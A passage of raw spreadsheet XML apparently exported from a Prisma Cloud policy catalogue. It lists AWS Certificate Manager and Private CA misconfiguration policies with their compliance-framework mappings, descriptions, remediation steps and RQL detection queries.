Framework (CSCRF), NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CSA CCM v4.0.12, CCPA 2018, PIPEDA, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, DORA, CSA CCM v.4.0.6, CyberSecurity Law of the People's Republic of China, HITRUST CSF v.9.6.0, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, DORA, ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, PCI DSS v4.0, NIST 800-171 Rev1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, HITRUST CSF v9.3 [Deprecated], NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1564" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1564" s="2" t="inlineStr"/>
      <c r="D1564" t="inlineStr"/>
      <c r="E1564" t="inlineStr"/>
      <c r="F1564" t="inlineStr"/>
      <c r="G1564" t="b">
        <v>1</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1564" t="inlineStr">
        <is>
          <t>aws-acm</t>
        </is>
      </c>
      <c r="K1564" t="inlineStr">
        <is>
          <t>AWS Certificate Manager (ACM) has certificates with Certificate Transparency Logging disabled</t>
        </is>
      </c>
      <c r="L1564" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1564" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1564" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1564" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1564" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1564" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1564" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1564" t="inlineStr"/>
      <c r="T1564" t="b">
        <v>1</v>
      </c>
      <c r="U1564" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1564" t="inlineStr">
        <is>
          <t>aws-acm-describe-certificate</t>
        </is>
      </c>
      <c r="W1564" t="inlineStr">
        <is>
          <t>This policy identifies AWS Certificate Manager certificates in which Certificate Transparency Logging is disabled. AWS Certificate Manager (ACM) is the preferred tool to provision, manage, and deploy your server certificates. Certificate Transparency Logging is used to guard against SSL/TLS certificates that are issued by mistake or by a compromised CA, some browsers require that public certificates issued for your domain can also be recorded. This policy generates alerts for certificates which have transparency logging disabled. As a best practice, it is recommended to enable Transparency logging for all certificates.</t>
        </is>
      </c>
      <c r="X1564" t="inlineStr">
        <is>
          <t>You cannot currently use the console to opt out of or into transparency logging. It's recommended to use the command line utility to enable transparency logging.
Remediation CLI:
1. Use the below command to list ACM certificate
 aws acm list-certificates
2. Note the 'CertificateArn' of the reported ACM certificate
3. Use the below command to ENABLE Certificate Transparency Logging
 aws acm update-certificate-options --certificate-arn &lt;certificateARN&gt; --options CertificateTransparencyLoggingPreference=ENABLED
where 'CertificateArn' is captured in the step2</t>
        </is>
      </c>
      <c r="Y1564" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'acm:UpdateCertificateOptions' permission. Successful execution will enable Certificate Transparency Logging for AWS Certificate Manager (ACM) certificates.",
'impact': 'Enables AWS Certificate Manager (ACM) certificate with Certificate Transparency Logging',
'cliScriptTemplate': 'aws acm update-certificate-options --region $region --certificate-arn $certificateArn --options CertificateTransparencyLoggingPreference=ENABLED'</t>
        </is>
      </c>
      <c r="Z1564" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-acm-describe-certificate' AND json.rule = 'type does not equal IMPORTED and (options.certificateTransparencyLoggingPreference equals DISABLED or options.certificateTransparencyLoggingPreference does not exist) and status equals ISSUED and _DateTime.ageInDays($.notAfter) &lt; 1'</t>
        </is>
      </c>
      <c r="AA1564" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1564" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1564" t="inlineStr">
        <is>
          <t>PC-AWS-ACM-165</t>
        </is>
      </c>
      <c r="AD1564" t="b">
        <v>1</v>
      </c>
      <c r="AE1564" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1564" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>546a493a-3979-42d1-a018-e07dbfc15ae6</t>
        </is>
      </c>
      <c r="AI1564" t="inlineStr">
        <is>
          <t>84870f04-0516-4cc1-b5b7-2abf9ad4a283</t>
        </is>
      </c>
      <c r="AJ1564" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1564" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1565">
      <c r="A1565" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, ISO/IEC 27001:2022, ISO/IEC 27001:2022, ISO/IEC 27017:2015, TX-RAMP Level 2, APRA (CPS 234) Information Security, CRI Profile v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v.9.6.0, CHC HITRUST CSF v.9.6.0, NIST SP 800-172, ISO/IEC 27017:2015, MLPS 2.0 (Level 3), Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, SOC 2, NIST 800-53 Rev4, FFIEC, ITSG-33, HITRUST CSF v.11.2.0, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST 800-171 Rev1, HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, CIS Controls v7.1, ISO/IEC 27017:2015, CSA CCM v3.0.1, ISO 27001:2013, ISO/IEC 27017:2015, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, Microsoft Cloud Security Benchmark v1, CyberSecurity Law of the People's Republic of China, ISO 27002:2022, ACSC Information Security Manual (ISM), NIST CSF, SOC 2, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS Controls v7.1, NIST 800-171 Rev1, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, DORA, NIST CSF v2.0, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v4.0, MLPS 2.0, PCI DSS v4.0, PCI DSS v3.2.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), CSA CCM v4.0.12, ISO/IEC 27017:2015, HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CHC HITRUST CSF v.9.6.0, DORA, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CSA CCM v3.0.1, APRA (CPS 234) Information Security, ITSG-33, CSA CCM v3.0.1, GDPR, CRI Profile v1.2.1, CSA CCM v3.0.1, HITRUST v.9.4.2 [Deprecated], kfirdaus AWS Account-CS, CRI Profile v2.0, NIST 800-53 Rev 5, CSA CCM v3.0.1, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, CIS Controls v8, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ITSG-33, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, RBI Baseline Cyber Security and Resilience Requirements, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1565" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1565" s="2" t="inlineStr"/>
      <c r="D1565" t="inlineStr"/>
      <c r="E1565" t="inlineStr"/>
      <c r="F1565" t="inlineStr"/>
      <c r="G1565" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1565" t="inlineStr">
        <is>
          <t>aws-acm</t>
        </is>
      </c>
      <c r="K1565" t="inlineStr">
        <is>
          <t>AWS Certificate Manager (ACM) has invalid or failed certificate</t>
        </is>
      </c>
      <c r="L1565" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1565" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1565" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1565" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1565" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1565" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1565" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S1565" t="inlineStr"/>
      <c r="T1565" t="b">
        <v>0</v>
      </c>
      <c r="U1565" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1565" t="inlineStr">
        <is>
          <t>aws-acm-describe-certificate</t>
        </is>
      </c>
      <c r="W1565" t="inlineStr">
        <is>
          <t>This policy identifies certificates in ACM which are either in Invalid or Failed state. If the ACM certificate is not validated within 72 hours, it becomes Invalid. An ACM certificate fails when,
- the certificate is requested for invalid public domains
- the certificate is requested for domains which are not allowed
- missing contact information
- typographical errors
In such cases (Invalid or Failed certificate), you will have to request for a new certificate. It is strongly recommended to delete the certificates which are in failed or invalid state.</t>
        </is>
      </c>
      <c r="X1565" t="inlineStr">
        <is>
          <t>To delete Certificates: 
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Go to Certificate Manager(ACM) service
4. Choose the reported certificate
5. Under 'Actions' drop-down click on 'Delete'</t>
        </is>
      </c>
      <c r="Y1565" t="inlineStr"/>
      <c r="Z1565" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-acm-describe-certificate' AND json.rule = 'status contains VALIDATION_TIMED_OUT or status contains FAILED'</t>
        </is>
      </c>
      <c r="AA1565" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1565" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1565" t="inlineStr">
        <is>
          <t>PC-AWS-ACM-182</t>
        </is>
      </c>
      <c r="AD1565" t="b">
        <v>1</v>
      </c>
      <c r="AE1565" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1565" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>77450a1c-97c2-4d75-847d-1f9c48320a9d</t>
        </is>
      </c>
      <c r="AI1565" t="inlineStr">
        <is>
          <t>76b0a80f-4fa8-4bc3-86c7-c51fe59b2fa6</t>
        </is>
      </c>
      <c r="AJ1565" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1565" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1566">
      <c r="A1566" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, ISO/IEC 27001:2022, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, DORA, CSA CCM v4.0.12, ITSG-33, TX-RAMP Level 1, GDPR, SOC 2, ISO/IEC 27001:2022, NIST 800-53 Rev 5, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B1566" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1566" s="2" t="inlineStr"/>
      <c r="D1566" t="inlineStr"/>
      <c r="E1566" t="inlineStr"/>
      <c r="F1566" t="inlineStr"/>
      <c r="G1566" t="b">
        <v>1</v>
      </c>
      <c r="H15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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1566" t="inlineStr">
        <is>
          <t>aws-acm</t>
        </is>
      </c>
      <c r="K1566" t="inlineStr">
        <is>
          <t>AWS Certificate Manager (ACM) RSA certificate key length less than 2048</t>
        </is>
      </c>
      <c r="L1566" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1566" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1566" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1566" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1566" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1566" t="inlineStr">
        <is>
          <t>Technological Controls</t>
        </is>
      </c>
      <c r="R1566" t="inlineStr">
        <is>
          <t>A8.1</t>
        </is>
      </c>
      <c r="S1566" t="inlineStr"/>
      <c r="T1566" t="b">
        <v>0</v>
      </c>
      <c r="U1566" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1566" t="inlineStr">
        <is>
          <t>aws-acm-describe-certificate</t>
        </is>
      </c>
      <c r="W1566" t="inlineStr">
        <is>
          <t>This policy identifies the RSA certificates managed by AWS Certificate Manager with a key length of less than 2048 bits. 
AWS Certificate Manager (ACM) is a service for managing SSL/TLS certificates. RSA certificates are cryptographic keys used for securing communications over networks. Shorter key lengths may be susceptible to attacks such as brute force or factorization, where an attacker could potentially decrypt the encrypted data by finding the prime factors of the key.
It is recommended that the RSA certificates imported on ACM utilise a minimum key length of 2048 bits or greater to ensure a sufficient level of security.</t>
        </is>
      </c>
      <c r="X1566" t="inlineStr">
        <is>
          <t>Note: You can't change the key length after importing a certificate. Instead, you must delete certificates with a key length smaller than 2,048 bits, and then the new RSA certificate should be imported with the desired key length.
To import the new certificate, Please refer to the below url
https://docs.aws.amazon.com/acm/latest/userguide/import-certificate-api-cli.html#import-certificate-api
To delete the reported ACM RSA certificate, Please refer to the below url
https://docs.aws.amazon.com/acm/latest/userguide/gs-acm-delete.html</t>
        </is>
      </c>
      <c r="Y1566" t="inlineStr"/>
      <c r="Z1566" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-acm-describe-certificate' AND json.rule = status equals "ISSUED" and keyAlgorithm starts with "RSA-" and keyAlgorithm equals RSA-1024</t>
        </is>
      </c>
      <c r="AA1566" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1566" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1566" t="inlineStr">
        <is>
          <t>PC-AWS-ACM-1144</t>
        </is>
      </c>
      <c r="AD1566" t="b">
        <v>1</v>
      </c>
      <c r="AE1566" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1566" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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6" t="inlineStr">
        <is>
          <t>97206f64-3af8-4cb9-b189-1d85a205ee07</t>
        </is>
      </c>
      <c r="AI1566" t="inlineStr">
        <is>
          <t>70aab2ba-11c4-4787-b06d-2d6184541fb2</t>
        </is>
      </c>
      <c r="AJ1566" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1566" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1567">
      <c r="A1567" t="inlineStr">
        <is>
          <t>HIPAA, Brazilian Data Protection Law (LGPD), ISO/IEC 27001:2022, ISO/IEC 27017:2015, TX-RAMP Level 2, APRA (CPS 234) Information Security, MLPS 2.0 (Level 3), CSA CCM v3.0.1, MLPS 2.0 (Level 3), NIST SP 800-172, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, SOC 2, MLPS 2.0, HITRUST CSF v.9.6.0, NIST 800-53 Rev4, NIST 800-171 Rev1, Secure Controls Framework (SCF) - 2024.2, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v3.0.1, ISO/IEC 27017:2015, Copy of CIS Controls v8, CIS Controls v8, Microsoft Cloud Security Benchmark v1, CyberSecurity Law of the People's Republic of China, ACSC Information Security Manual (ISM), NIST CSF, CHC HITRUST CSF v.9.6.0, SOC 2, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, NIST 800-171 Rev1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, MLPS 2.0 (Level 2), CSA CCM v4.0.12, ISO/IEC 27017:2015, Brazilian Data Protection Law (LGPD), HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, MLPS 2.0, CSA CCM v3.0.1, APRA (CPS 234) Information Security, ITSG-33, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, CSA CCM v3.0.1, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CSA CCM v3.0.1, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, CyberSecurity Law of the People's Republic of China, ITSG-33, HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1567" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1567" s="2" t="inlineStr"/>
      <c r="D1567" t="inlineStr"/>
      <c r="E1567" t="inlineStr"/>
      <c r="F1567" t="inlineStr"/>
      <c r="G1567" t="b">
        <v>0</v>
      </c>
      <c r="H15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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1567" t="inlineStr">
        <is>
          <t>aws-acm</t>
        </is>
      </c>
      <c r="K1567" t="inlineStr">
        <is>
          <t>AWS Certificate Manager (ACM) contains certificate pending validation</t>
        </is>
      </c>
      <c r="L1567" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1567" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1567" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1567" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1567" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1567" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1567" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S1567" t="inlineStr"/>
      <c r="T1567" t="b">
        <v>0</v>
      </c>
      <c r="U1567" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1567" t="inlineStr">
        <is>
          <t>aws-acm-describe-certificate</t>
        </is>
      </c>
      <c r="W1567" t="inlineStr">
        <is>
          <t>This policy identifies invalid certificates which are in AWS Certificate Manager. When your Amazon ACM certificates are not validated within 72 hours after the request is made, those certificates become invalid and you will have to request new certificates, which could cause interruption to your applications or services. Though AWS Certificate Manager automatically renews certificates issued by the service that is used with other AWS resources. However, the ACM service does not automatically renew certificates that are not currently in use or not associated anymore with other AWS resources. So the renewal process including validation must be done manually before these certificates become invalid.</t>
        </is>
      </c>
      <c r="X1567" t="inlineStr">
        <is>
          <t>To validate Certificates: 
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Go to Certificate Manager(ACM) service
4. Choose the reported certificate
5. Validate your certificate for your domain using either Email or DNS validation, depending upon your certificate validation method.
OR
If the certificate is not required you can delete that certificate. To delete invalid Certificates:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Go to Certificate Manager(ACM) service
4. Choose the reported certificate
5. Under 'Actions' drop-down click on 'Delete'
Note: This alert will get auto-resolved, as the certificate becomes invalid in 72 hours. It is recommended to either delete or validate the certificate within the timeframe.</t>
        </is>
      </c>
      <c r="Y1567" t="inlineStr"/>
      <c r="Z1567" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-acm-describe-certificate' AND json.rule =  'status contains PENDING_VALIDATION'</t>
        </is>
      </c>
      <c r="AA1567" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1567" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1567" t="inlineStr">
        <is>
          <t>PC-AWS-ACM-169</t>
        </is>
      </c>
      <c r="AD1567" t="b">
        <v>1</v>
      </c>
      <c r="AE1567" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1567" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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7" t="inlineStr">
        <is>
          <t>01740791-ebd5-417a-bbfe-e1fdfc322dcc</t>
        </is>
      </c>
      <c r="AI1567" t="inlineStr">
        <is>
          <t>33720377-c258-4e64-b956-1e547548607d</t>
        </is>
      </c>
      <c r="AJ1567" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1567" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1568">
      <c r="A1568" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, CSA CCM v4.0.12, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, CSA CCM v4.0.12, ITSG-33, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1568" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1568" s="2" t="inlineStr"/>
      <c r="D1568" t="inlineStr"/>
      <c r="E1568" t="inlineStr"/>
      <c r="F1568" t="inlineStr"/>
      <c r="G1568" t="b">
        <v>1</v>
      </c>
      <c r="H15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68" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1568" t="inlineStr">
        <is>
          <t>aws-acm</t>
        </is>
      </c>
      <c r="K1568" t="inlineStr">
        <is>
          <t>AWS Private CA root certificate authority is enabled</t>
        </is>
      </c>
      <c r="L1568" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1568" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1568" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1568" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1568" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1568" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R1568" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S1568" t="inlineStr"/>
      <c r="T1568" t="b">
        <v>0</v>
      </c>
      <c r="U1568" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1568" t="inlineStr">
        <is>
          <t>aws-acm-pca-certificate-authority</t>
        </is>
      </c>
      <c r="W1568" t="inlineStr">
        <is>
          <t>This policy identifies enabled AWS Private CA root certificate authorities.
AWS Private CA enables creating a root CA to issue private certificates for securing internal resources like servers, applications, users, devices, and containers. The root CA should be disabled for daily tasks to minimize risk, as it should only issue certificates for intermediate CAs, allowing it to remain secure while intermediate CAs handle the issuance of end-entity certificates.
It is recommended to disable the AWS Private CA root certificate authority to secure.</t>
        </is>
      </c>
      <c r="X1568" t="inlineStr">
        <is>
          <t>To update the status of the Private CA root certificate authority:
1. Sign in to your AWS account and open the AWS Private CA console
2. On the 'Private certificate authorities' page, choose the reported private CA
3. On the 'Actions' menu, choose 'Disable' to disable the private CA.</t>
        </is>
      </c>
      <c r="Y1568" t="inlineStr"/>
      <c r="Z1568" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-acm-pca-certificate-authority' AND json.rule = Type equal ignore case ROOT and Status equal ignore case active</t>
        </is>
      </c>
      <c r="AA1568" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1568" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1568" t="inlineStr">
        <is>
          <t>PC-AWS-PCA-1257</t>
        </is>
      </c>
      <c r="AD1568" t="b">
        <v>1</v>
      </c>
      <c r="AE1568" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1568" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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68" t="inlineStr">
        <is>
          <t>a811518d-edbc-4965-bcbd-8586a3a00b17</t>
        </is>
      </c>
      <c r="AI1568" t="inlineStr">
        <is>
          <t>5e380ed5-a8a2-409e-8e18-429e4caf0638</t>
        </is>
      </c>
      <c r="AJ1568" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1568" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1569">
      <c r="A1569" t="inlineStr"/>
      <c r="B1569" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1569" s="2" t="inlineStr"/>
      <c r="D1569" t="inlineStr"/>
      <c r="E1569" t="inlineStr"/>
      <c r="F1569" t="inlineStr"/>
      <c r="G1569" t="b">
        <v>0</v>
      </c>
      <c r="H15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69" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1569" t="inlineStr">
        <is>
          <t>aws-amplify</t>
        </is>
      </c>
      <c r="K1569" t="inlineStr">
        <is>
          <t>llatorre - test - 20240410</t>
        </is>
      </c>
      <c r="L1569" t="inlineStr"/>
      <c r="M1569" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1569" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1569" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1569" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1569" t="inlineStr"/>
      <c r="R1569" t="inlineStr"/>
      <c r="S1569" t="inlineStr"/>
      <c r="T1569" t="b">
        <v>0</v>
      </c>
      <c r="U1569" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1569" t="inlineStr">
        <is>
          <t>aws-amplify-app</t>
        </is>
      </c>
      <c r="W1569" t="inlineStr"/>
      <c r="X1569" t="inlineStr">
        <is>
          <t>call llatorre@paloaltonetworks.com</t>
        </is>
      </c>
      <c r="Y1569" t="inlineStr"/>
      <c r="Z1569" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND cloud.service = 'AWS Amplify' AND api.name = 'aws-amplify-app' AND json.rule = description contains llatorre</t>
        </is>
      </c>
      <c r="AA1569" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1569" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1569" t="inlineStr"/>
      <c r="AD1569" t="b">
        <v>0</v>
      </c>
      <c r="AE1569" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1569" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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69" t="inlineStr">
        <is>
          <t>b5c2e1ea-9e55-4ea1-9b58-42b011ca6539</t>
        </is>
      </c>
      <c r="AI1569" t="inlineStr">
        <is>
          <t>f88a959b-f473-48b0-a340-c1afa46718ea</t>
        </is>
      </c>
      <c r="AJ1569" t="inlineStr">
        <is>
          <t>true</t>
        </is>
